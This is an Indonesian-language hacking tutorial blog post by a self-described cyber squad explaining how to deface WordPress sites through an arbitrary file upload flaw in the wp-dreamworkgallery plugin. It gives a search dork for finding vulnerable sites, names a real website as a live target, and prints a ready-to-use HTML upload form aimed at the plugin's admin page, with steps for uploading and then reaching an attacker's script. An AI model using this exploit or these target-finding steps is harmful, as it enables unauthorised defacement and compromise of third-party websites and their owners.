Deface POC Arbitrary + Live Terget
Hello My Friends balik lagi Ama si Adm00N JCS/Jason Cyber Squad Kali Ini gua bakal ngasih tutor Deface POC Arbitrary
Pertama tama
Ini Dork Nya yaa pak inurl:/wp-content/plugins/wp-dreamworkgallery
Ini live Target Nya H3h3
http://salonbluehair.com
Ini Csrf nya ya pak
<form action="http:/target.com/wp-admin/admin.php?page=dreamwork_manage" method="POST" enctype="multipart/form-data"> <input type="hidden" name="task" value="drm_add_new_album" /> <input type="hidden" name="album_name" value="Arbitrary File Upload" /> <input type="hidden" name="album_desc" value="Arbitrary File Upload" /> <input type="file" name="album_img" value="" /> <input type="submit" value="Submit" /> </form>
Save pake Extensi Html yaakk
Teros DORKing dlo kalo vuln kek gini nih gambar nya kalo vuln tampilan nya kek gini nihh
Teros langsung Gasak Yaak
Lu upload script lu di Csrf itu
Teros bagaimana cara akses nyaa
Lu salin kode yang gua garis bawahin
Lu salin kode nya sampe nama sc lu
Done
Thanks To ADM00N JASON CYBER SQUAD
SarkEvih_ID
Z3X_ID
2M4
Komentar
Posting Komentar